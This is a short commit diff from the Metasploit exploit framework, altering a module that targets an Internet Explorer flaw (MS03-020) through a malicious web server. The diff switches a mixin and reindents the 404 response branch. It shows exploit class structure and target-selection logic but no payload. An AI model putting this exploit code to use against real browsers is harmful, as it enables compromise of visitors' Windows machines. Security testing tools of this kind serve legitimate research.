its really an html exploit...
git-svn-id: file:///home/svn/incoming/trunk@3484 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
8d2582dffa
commit
7f270f55b0
|
@ -4,7 +4,7 @@ module Msf
|
|||
|
||||
class Exploits::Windows::Browser::MS03_020_Ie_ObjectType < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::HttpServer
|
||||
include Exploit::Remote::HttpServer::Html
|
||||
include Exploit::Remote::Egghunter
|
||||
|
||||
def initialize(info = {})
|
||||
|
@ -62,11 +62,9 @@ class Exploits::Windows::Browser::MS03_020_Ie_ObjectType < Msf::Exploit::Remote
|
|||
when /Windows NT/
|
||||
ret = target['Rets'][0]
|
||||
else
|
||||
print_status("Sending 404 to user agent: #{request['User-Agent']}")
|
||||
|
||||
cli.send_response(create_response(404, 'File not found'))
|
||||
|
||||
return
|
||||
print_status("Sending 404 to user agent: #{request['User-Agent']}")
|
||||
cli.send_response(create_response(404, 'File not found'))
|
||||
return
|
||||
end
|
||||
|
||||
# Re-generate the payload
|
||||
|
|
Loading…
Reference in New Issue